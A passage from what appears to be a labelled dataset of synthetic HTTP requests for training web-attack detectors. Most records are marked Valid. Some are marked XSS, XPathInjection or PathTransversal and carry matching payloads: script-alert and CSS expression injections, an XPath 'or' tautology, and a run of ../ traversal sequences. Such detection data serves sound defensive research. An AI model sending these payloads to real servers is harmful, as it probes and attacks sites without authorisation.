GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: 35.83.111.49
Connection: close
Accept: audio/*, text/xml, video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.8, windows-1255;q=0.0, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 98.141.212.240
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="2"
Date: Sat, 15 Dec 07 10:54:29 GMT
ETag: "TClpSRyVRpjXpah"
Expect: ouonu
From: oeed@ro5sY.uk
If-Modified-Since: Fri, 21 Sep 07 01:21:45 GMT
If-Unmodified-Since: Sat, 08 Sep 07 15:48:17 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 783
Pragma: ie='ustwA'
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: /igbrttda/rxns/ame0/lhdtaky.cfm
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 2.1; Hc-8a; rv:6.7.3) Gecko/65660526
UA-Disp: 5862,1372,32
UA-OS: Linux
UA-Pixels: 139x000
Via: 9.7 www.etpbcee.html
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3

null

End - Id: 46475
Start - Id: 22372
class: Valid
GET /zahwsJb7bc/79.mspx? HTTP/1.1
Host: 217.152.113.46
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tguf-io;q=0.0, ls-pi;q=0.7, iddowat1-cDijdb;q=0.7, ddnursrm-Uieall
Cache-Control: no-store
Client-ip: 103.42.173.157
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="6"
Date: Mon, 25 Jan 10 04:24:15 CET
ETag: W/"VSjXHggiuo.Ht67"
Expect: 100-continue
From: td9h@ogde.be
If-Modified-Since: Thu, 18 Dec 08 15:50:04 GMT
If-Unmodified-Since: Mon, 24 May 04 14:44:23 UTC
If-Match: *
If-None-Match: "58kDnwTq-e4Gd-x3KqQ"
If-Range: Tue, 27 Oct 09 17:49:42 CET
Max-Forwards: 87
MIME-Version: 8.8
Pragma: 0t='dsseiIt'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: Digest qop=auth-int
Range: 541-893,-04,-1
Referer: http://www.9ahwda.net/lned/Nooh.sh
TE: gzip;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.7 (X11; U; Linux i386 5.5; mx-fh; rv:8.1.0) Gecko/31988967
UA-CPU: MIPS
UA-Disp: 0605,1336,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 112x1566
Via: HTTP/2.9 www.tsze7hse.js
Transfer-Encoding: deflate
Upgrade: ncmcde/3.0, naroen/8.2
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22372
Start - Id: 19835
class: Valid
GET /emkexenf/95uile/csr6T/n-Ooeb5o3QND3yW1/oaEabhDimwcto9Et4u/0qto/g9newwpnFEF@yw/ssKzee/cMZ_replaceeD.tiff?eb=An%3Dt2rleautoexecb&Edpl=139013&4LM9sZM5e=745411&tg=304&ceOipdahins=bn&tte=1ubU3nr9btracotlf&lj5hyhs=3125&t03=93&eoayeh=cosrdeeeTr&opaFee4aOioelot=ehseio&yLdelete9vSmN=uuewbns&stnpasytar=mtmrty&teb=801451&gtrXt=reile2TJcroe5&g.vAgCFdiv4s=th%3B HTTP/1.1
Host: 180.169.50.6:99
Connection: oaesHcll
Accept: application/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: o-ir3fv1ah;q=0.8, khaelaet-ograsu;q=0.2
Cache-Control: only-if-cached
Client-ip: 38.40.186.231
Cookie: rtHtD63t= n;trrlaie=029518;9inru=r/div(t;edaeEti=156667380;tvxedtem=h93eckc2isttmdde;tadosntPcI=wRhyadEwindow.openg
Cookie2: $Version="666"
Date: Sat, 10 Nov 07 14:39:37 UTC
ETag: W/"xC2ERrrF1VCjBvE.b"
Expect: 100-continue
From: vHtmgsc3@Erycrasht.be
If-Modified-Since: Tue, 18 Jul 06 10:25:15 UTC
If-Unmodified-Since: Wed, 19 Dec 07 22:23:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 07:23:41 GMT
Max-Forwards: 1760
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest username="NoExp"
Authorization: asdsca broUbot=v1Hmd
Range: 31-27672,31-,92-
Referer: /datRfylj/pe6E/yad7b.cgi
TE: chunked
Trailer: Accept-Encoding
User-Agent: ee8s5ohgedtDah
UA-CPU: StrongARM
UA-Disp: 563,5037,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 244x9967
Via: FTP/6.5 www.naobUi.gif:2270, HTTP/8.9 87.165.159.205, 0.1 3.235.24.109:98
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19835
Start - Id: 16067
class: Valid
GET /mlFgeeinhre9e/stdins/wlVrO/bvvM.i@DFdHL/hAs6ee36xntsfnee/xiiHp/cIKPDnEHv2MPyB/3RaeeperGcj/f4sdai4rITuaeeel/6iccs.exe?Hoioh=0048165146&kmi2uiei5sde=2hnsl&ertehn2i2dotua=4yicx+&hunw9ort6=si&JWrmi_Ss_ZVSA=unmotr&UBnjZb=C%268ud&uiroosossjeome=18911308&esi=tmp-wherem+asampboot.inihLm%2F%24c&copyJzd4sRzchild=iXNm%40&Ew9rh=pmturau8nthr7nn&BYKl=lsRas&Fshutdown7sgL6access_logE=liItase0rdwemf&n5bistIeluzaxt=%7Cinput%26l HTTP/1.1
Host: 247.150.54.89
Connection: keep-alive
Accept: audio/basic;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 15.101.56.243
Cookie: iqn8rhdnOa=>nsbodyoshutdownhi arp dtnhv;tEPuo=1tlo1formemesi6;XMTp@NGwp-z=o4o;eas=3ahtg;pkBhnc@=xtermai;siB1aoteg=5
Cookie2: $Version="7"
Date: Thu, 18 Mar 10 01:31:55 CET
ETag: "rNPQqSBe3adujrY"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Tue, 21 Feb 06 24:49:06 GMT
If-Unmodified-Since: Sat, 13 Sep 08 06:02:17 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: *
Max-Forwards: 781
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Digest nonce
Range: -84,27-038,192411-63468
Referer: http://9avoWuey.fr/5ils0fmn/sqeceg.jpeg
TE: trailers,chunked;q=0.7,deflate
Trailer: Via
User-Agent: Mozilla/0.1 (compatible; MSIE 9.5; Win98; melils7)
UA-CPU: MIPS
UA-Disp: 489,939,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 973x791
Via: HTTP/4.0 www.iii0iadr.html, 7.0 www.vhfa.html
Transfer-Encoding: Rlmv; sE0igil=el3csi
Upgrade: LiIjol/2.0, i3o9c/4.2, oeoe2/3.1, dueh/3.0, sczse6/4.7
Warning: 143 75.253.104.203 "yotde2operezehhhize" 
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16067
Start - Id: 2109
class: Valid
GET /gfsbEtuifthotel/adle0nfST0/eetae4dt797m.php?optu1@YTUWQ=189761&aule=mtnto HTTP/1.1
Host: www.rupcs1euN.uk:80
Connection: eEshm
Accept: audio/x-wav, text/html, video/*
Accept-Charset: x-mac-greek, windows-1255;q=0.0, windows-1251
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=82486
Client-ip: 152.109.97.244
Cookie: jtysnbgrtteE=dr870nEoa;e1BtTdniiice=jneaofori;rdbC7ditoe7h=bmB;tmtipe=fuzLkzC2Zx
Cookie2: $Version="7"
Date: Tue, 10 Apr 07 15:01:32 GMT
ETag: W/"q8cmxRdF9pNsuulE7TC"
Expect: 100-continue
From: ei2rr@oTiWtg.com
If-Modified-Since: Tue, 22 Jul 08 23:43:11 UTC
If-Unmodified-Since: Wed, 24 Oct 07 09:00:02 GMT
If-Match: "-0Ipi_7CSwSxxD_"
If-None-Match: "T-2vjQ8k4hdvsi@"
If-Range: "2LGmtzhDlUC3tFE@"
Max-Forwards: 4
MIME-Version: 1.6
Pragma: fu3vgF='3N'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bWRlajF3aWtzdVZpZXN3dGVpcm9ybW5lT2RPbXNzVGVv
Range: 621-,04-,-085540
Referer: http://ppctg.be/xeii8ss.asp
TE: trailers
Trailer: Upgrade
User-Agent: s715tasion7sUsief6l
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: 7.3 239.109.228.106
Transfer-Encoding: gzip
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 138.19.39.77
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2109
Start - Id: 47787
class: XSS
GET /vlAKW@6/7Xg00eVjr1FTsKC/f56o/4aSuv/tM4TBsD24ZUBn/-m/aaxfq/UgrTEH7D-06E9QU/rDmft9DoPkAKTw2Vf1YN/ln1tMVEeaj.js?oe=7346&7oenrndo2yensmn=Gtsh++style%3Dleft%3Aexpression%28alert++++%28ogtn.1p3%29%29&Thmlh=%3BwEryt0a HTTP/1.1
Host: www.reSheyeoee.ch
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3st-7ehe, smfcTm-see;q=0.4, eeine-Tc, snvaa-amhiuc, ctmts9-hroala
Cache-Control: min-fresh=67
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="70"
Date: Mon, 28 Jun 04 17:33:21 CET
ETag: W/"5Ztigf4VNFI34Up"
Expect: tese=ojdN1;xeEsf
From: dRkiaeue@o6si.cz
If-Modified-Since: Thu, 19 May 05 02:03:23 CET
If-Unmodified-Since: Sat, 09 Apr 05 24:40:00 UTC
If-Match: "8rczmuoGye1S251ch"
If-None-Match: "58MJ1jIeIYKqDDZ5pe9"
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: /a3semoh/usfJ04/orrtes/iita/crdnq.html
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: 63dgHleah/4.6.7
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7737x1025
Via: HTTP/8.4 www.yidb.css
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 264 239.66.183.33 "kes2a" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47787
Start - Id: 34963
class: Valid
POST /Nededo2/fIy1YXxlaUx_-6/mc8BK6CB_HEinC6MhPi/8rr3anir0o.bin? HTTP/1.0
Content-Length: 170
Content-Language: ngAmetkA,1syremi
Content-Encoding: compress
Content-Location: /t6sn/ooitx.mdb
Content-MD5: SHNpZWVtdG5FaHJTZXJocg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Sep 04 22:27:00 UTC
Last-Modified: Sat, 09 Sep 06 11:36:45 CET
Host: www.ulaeitgNl.com:681
Connection: keep-alive
Accept: application/x-tar, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity;q=0.2, compress, gzip;q=0.8, compress
Accept-Language: tjy-imdr;q=0.3, sunntsl-r;q=0.9, aehtiUr-C;q=0.8, e16d-0si, aclcagl-s
Cache-Control: no-transform
Client-ip: 186.231.177.82
Cookie: egtk6Homdybee=3138;fgriy3ifHcStl=ooot;ehtbeyba=5;B5Y_X=0658;swhejcleE9=nfsE;U3oeyohgG9tCrli=ijr3ewinntexosh ry(ohA
Cookie2: $Version="223"
Date: Thu, 26 Aug 04 16:43:00 GMT
ETag: "INuV8pKCEwWu6gA8wE"
Expect: ogwo8ea
From: Jfon@lR0e.de
If-Modified-Since: Sun, 11 Nov 07 15:54:56 UTC
If-Unmodified-Since: Sun, 10 Sep 06 09:17:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 5.8
Pragma: owtl=t7c
Proxy-Authorization: pmzaie 9Isacsy=ohii35un
Authorization: Basic cklrczhhZGQ6ZWE1R3I2ZHM=
Range: 26302-,-510,4934-
Referer: http://www.qe9G.ch/xnptrStg/ceUt2gni/uhAixgD.nsf
TE: deflate,trailers
Trailer: Upgrade
User-Agent: osr5/8.4.0.0
UA-CPU: StrongARM
UA-Disp: 4391,758,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1780x097
Via: HTTP/0.4 1.54.232.123
Transfer-Encoding: deflate
Upgrade: innn6t/6.3, msmcsf/6.6, i2Dtn/7.9, oet/3.7
Warning: 360 62.80.65.21 "urvcnetdenma" "Tue, 25 Sep 07 21:36:03 CET"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 755245432377424
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eTR=ecsateeaacNglthexn&HPwd99sdh=Ciyps&c4ke1aig=fsGjOJfq@i&hpere=73089595&st5nkl9p=ruFXF.l&bmdlb=ilnssenaiu8jzeh&etTsuie8icOae=(linkp+oh&bodyza~&i7ofad55d8go=Ed

End - Id: 34963
Start - Id: 28028
class: Valid
GET /teNpfQWEzJ0/8G2LceDt5.GCdoIR.nc/873hyzHg/7F/r.0pPbtRImIdKJTgC6gI/o6PNVF2eEq/eeves1y/oettg57hhtYr/oseioorrlihroteztns.js?qsdeidmetme=qstyle%25&Se3ursJhmx=e8uapasswd&gDoiulte0aDDoet=M3Bag%3C&gobjectQuHt=83444532 HTTP/1.0
Host: www.sartbuoNl.net
Connection: nqou1ont
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: parttK-htinnn, nEtrmng-lt, raworxg-Ideo, s-kof, h-bq
Cache-Control: max-age=6
Client-ip: 219.159.73.58
Cookie: ichildhiUiWks=uassTt6euwqebw8;F5FRpasswd0LNc8=maoaE0rnAhV;zPwnJscriptsA6=629832;agmto=arsi;9yTsc8E=ldA@;L3RxIinputIFk=54023784
Cookie2: $Version="9"
Date: Tue, 23 Dec 08 14:10:01 GMT
ETag: W/"C5s5DELR3662.cu_7@"
Expect: 100-continue
From: gu9cDaia@ar6it9.st
If-Modified-Since: Sat, 05 Mar 05 16:56:10 CET
If-Unmodified-Since: Wed, 12 Jan 05 08:04:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Oct 07 02:55:50 CET
Max-Forwards: 7
MIME-Version: 8.8
Pragma: Ensl=auztg
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: soti ndDtcr=h5wwsl
Range: 423138-8,594351-,3-756362
Referer: /nheiiehe/ciwp.asmx
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 4.9; 7a-ra; rv:7.1.9) Gecko/93963267
UA-CPU: PowerPC
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: HTTP/9.6 www.ruaei.jpeg
Transfer-Encoding: deflate
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 45504056220
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28028
Start - Id: 35738
class: XPathInjection
GET /ROkZtBTLB9aFuvar/nnIoralen5eiNy/tARxk-YG0JqNrZJ.jpeg?teesmteea0sdluh=ear&oRee4rh=tee%2FmiU%2FEA2%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D938%5D++or+%27dc3s5fdd%27%3D+%27&6UULLQi=%2Beoi&ka=oecaa6ucuat HTTP/1.0
Host: 117.99.108.59
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate;q=0.2, identity, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=93
Client-ip: 23.174.149.92
Cookie: Lsten9AaTR=brtdrf
Cookie2: $Version="4"
Date: Sun, 19 Sep 04 04:15:58 GMT
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: *
If-None-Match: *
If-Range: "hULMYLcAiVP.dugPDR"
Max-Forwards: 22
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="ta7oAu"
Authorization: Digest nonce
Range: 820401-
Referer: http://www.na6inpe.net/d9sar/fmllciti.mpg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 1.3; nn-ar; rv:7.5.2) Gecko/52071759
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 6.1 125.114.92.152
Transfer-Encoding: gzip
Upgrade: oretk/3.3, 5iN/2.4, mntxa/1.5, aeiir/6.2, nfo/9.7
Warning: 093 www.Ieie.htm "d6amUeljrciludeds4l" "Sat, 17 May 08 17:12:51 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35738
Start - Id: 723
class: Valid
GET /mnrnnyr7ssetqe1zuSte/RatbdOIe/DTXqCNYphp/uewstnirrosM7bishHe/OM/T0Dwindow.open0PqTJ9Nd/isEhfoCste/znnApmiELtUcrt/iJIASEp7.n7nYKMDK8H/1x.bin? HTTP/1.1
Host: 243.248.153.224
Connection: hoUtr
Accept: audio/*;q=0.4, audio/*, video/mpeg
Accept-Charset: windows-1255, us-ascii, x-mac-chinesetrad, euc-jp;q=0.7
Accept-Encoding: identity, gzip;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 193.159.93.10
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="5"
Date: Sat, 01 Jul 06 09:22:48 CET
ETag: W/"3R1QzRCMLW2qhvW"
Expect: 100-continue
From: 8souerw@etjeeAsn.net
If-Modified-Since: Sat, 17 Nov 07 16:09:00 UTC
If-Unmodified-Since: Sat, 28 Nov 09 10:42:25 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 04:31:49 UTC
Max-Forwards: 3275
MIME-Version: 8.8
Pragma: ececes='o7atf'
Proxy-Authorization: riett grerxIas=LSauaaO
Authorization: Digest qop=auth
Range: -523,85-12956,5-
Referer: /r7stw.jsp
TE: trailers,deflate,gzip
Trailer: Proxy-Authorization
User-Agent: qgUta/4.4.2
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 180x0493
Via: 7.5 www.g9tgLtn.css:4098, 6.5 213.207.191.140, 5.7 www.peim.png
Transfer-Encoding: 7lOpsp; 7orstsiu=ayompTvB
Upgrade: tge/4.9, sslx/9.8, h1nyOt/0.0, Ocaah/5.6
Warning: 247 www.6atoou9u.css:82615 "7ySec6LYstptsi" 
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 723
Start - Id: 44932
class: PathTransversal
GET /bgSp47_SvLG-3LpQKJ/n@dCMlJd2cp/et1ysu1r2Fvv/h3JSGvNWq7GY/A9/b-wmZPa4.js?Ercdigot2a4ze=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&lhko=M7cSp5ueepHin&ugJFcVzp.Mz=vCosthas&utdsdm=doabodyyzc&qt=3To&An2jJLtwgetSscriptdq=o%26rV HTTP/1.1
Host: 69.236.89.46
Connection: e0sho
Accept: image/*;q=0.5
Accept-Charset: cp-932, windows-874, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: wiLnp-r;q=0.4, belu-mreSm;q=0.0, yre6-sCswT;q=0.9, oo-lrawl
Cache-Control: no-transform
Client-ip: 119.33.88.93
Cookie: eyec=2insz3eH;eriS=xgp.yv;fysc=g@mal
Cookie2: $Version="19"
Date: Wed, 26 Sep 07 16:35:24 CET
ETag: W/"XLxzFuV8SXEFv.mqCY"
Expect: laocgTl
From: naaodg1@I4Nh.uk
If-Modified-Since: Sat, 21 Oct 06 08:43:42 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "R9.6u-DR1RLZuPZH5Zf6"
If-None-Match: *
If-Range: Sun, 10 May 09 10:14:13 UTC
Max-Forwards: 938
MIME-Version: 7.1
Pragma: De=scotyld
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: dsaymv n8rorao=tsrtn
Range: 965978-,-986,-07275
Referer: /mTnate/2uuptlw/Embtsed.pdf
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 1.2; yn-oo; rv:1.4.2) Gecko/62949751
UA-CPU: StrongARM
UA-Disp: 3440,7675,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: FTP/6.5 www.dlrtn.css, 5.3 www.ilbntfnq.shtml
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44932
Start - Id: 11205
class: Valid
GET /umteap9Rtl6hhwbG/logD5/ztlwhpucByzet.msf? HTTP/1.0
Host: 33.56.172.6
Connection: cdEiua
Accept: text/html;q=0.2, application/rtf
Accept-Charset: x-mac-greek, iso-8859-15, iso-8859-2, euc-cn;q=0.8, iso-2022-jp
Accept-Encoding: 
Accept-Language: evvza-rtilyT5L, oeeeasrt-8tinmtat;q=0.2
Cache-Control: max-age=5008
Client-ip: 57.60.178.137
Cookie: jaEaaht=4;un3=n2mRqp
Cookie2: $Version="6"
Date: Tue, 27 Jan 04 13:06:23 CET
ETag: "zXSC2Mz4_ZtVSzXpi"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Thu, 26 Feb 09 09:00:30 UTC
If-Unmodified-Since: Mon, 08 Mar 04 18:51:59 CET
If-Match: "iJpf3PWf3c-xqFfJes4"
If-None-Match: "SM-fajmz6wyyGfk6R"
If-Range: "FMRDR1VMg5B2e2z"
Max-Forwards: 3243
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="irua"
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: /esai/epdt/jcada/hifteehr/VjsIre.jpeg
TE: deflate;q=0.3
Trailer: Authorization
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 4.0; ce-mt; rv:7.9.2) Gecko/06900179
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1597x0250
Via: turNtn/1.8 www.tnenOn.tiff, FTP/7.7 www.GBwnhu.css, 5.0 www.uxrysuj.png
Transfer-Encoding: deflate
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11205
Start - Id: 864
class: Valid
GET /_7MAfdVofrYHK/nEeFAQ1V7e/lo8ed/wWPaYob.2SlXZVC64/nEihH/YftiannE3stuheWetPm.css?a6Aabsystem-O=i0QYkvhC08p&48eaaiuamrttn=l%3Cnocdnsrobject9ine&dwtzuipe=sQkkdEYVG&Ftteasae=7&SDuE2qbVM=hpdsnpreye1l4vm&pvBV9Fz_te=3558230424&lifr=auclKxs HTTP/1.1
Host: 30.60.219.31:80
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate, gzip, compress;q=0.5, identity;q=0.7
Accept-Language: Eter8r-sw1iaee;q=0.2, d-ianlro;q=0.1, eehtacu6-0r, 6tt-s0, s-twesw6st
Cache-Control: no-cache
Client-ip: 224.196.3.193
Cookie: a78sgiieMwls=enkA5Gva4;gsnha4htveey=4+ Et;fooalSnbhoirtr=12
Cookie2: $Version="84"
Date: Sun, 09 Jul 06 23:27:13 UTC
ETag: "z.JVt4yr9ZxbvMY_0PAC"
Expect: 100-continue
From: eboyso@usT0nl.gov
If-Modified-Since: Sun, 28 Nov 04 09:26:57 GMT
If-Unmodified-Since: Sun, 05 Mar 06 17:13:11 UTC
If-Match: "ZO245NXFMjOaeE8tlK"
If-None-Match: *
If-Range: Sun, 25 May 08 02:42:40 GMT
Max-Forwards: 456
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM NW5qZXdhaW1ybzNpc2FybDBhc25zZXhpRW5kVGUzaTdldGk1MGFr
Authorization: inmg l0meid=init8nnq
Range: 95471-
Referer: /tFhp.jsp
TE: deflate,chunked;q=0.3,trailers
Trailer: Warning
User-Agent: bs8OstgJncnr3fs
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: 7.0 www.tte97a.jpg:0
Transfer-Encoding: bopv; hjuwi6H=7tosel
Upgrade: egr3ra/0.6, ttlAni/8.2, lss/8.2, Nehhrl/4.6, vSE/1.0
Warning: 516 www.cSed.gif "3esIs8eap6a" "Sat, 13 Jan 07 17:36:06 GMT"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 864
Start - Id: 21096
class: Valid
GET /5Mzw2sci8hP08KV/bdo1aiyhobdorO/t19MQDnHFs8HnrZTA7/qb5adminKXgBcopyEdZs/pehaOwl/h7cMDlimgupdateall_3z/3taTl/n_K/lFaee7aliftXst/eyLxeFjCy/eVHtXBYAOc7mzw3T6MBw.mspx?gGAKphp1Y=42391&ZKC8r4=tutf&rshhhyst=40821&VusrZp.=Ewlumi&ei3gtn7alaw=976476&ittneajeel=o%2Fr&742=nwp-pscriptwht&5slsr4yr=apdsloEisten&etelthasoDhddh=cDLr0%3F&vtwesoA=6559 HTTP/1.1
Host: www.ngoo1eoe.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i;q=0.3, windows-1254, x-mac-japanese;q=0.5, big5, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.103.228.226
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="0"
Date: Sat, 16 Jun 07 21:43:03 UTC
ETag: W/"SYfeAvoxhH0gnco5_U"
Expect: uwlSsit=ol2ea
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Sun, 06 Sep 09 18:19:54 GMT
If-Match: *
If-None-Match: "MrdTJN@w.GHKSlD9NOB"
If-Range: Tue, 15 Sep 09 21:10:10 CET
Max-Forwards: 47
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: NTLM aXc2MXJuem9hZnR1dGVtVW9hY2lyc2Fnc1JycmRzTmhydjRlZWx3bHBpOGFjc3Q=
Range: 72-,4-191
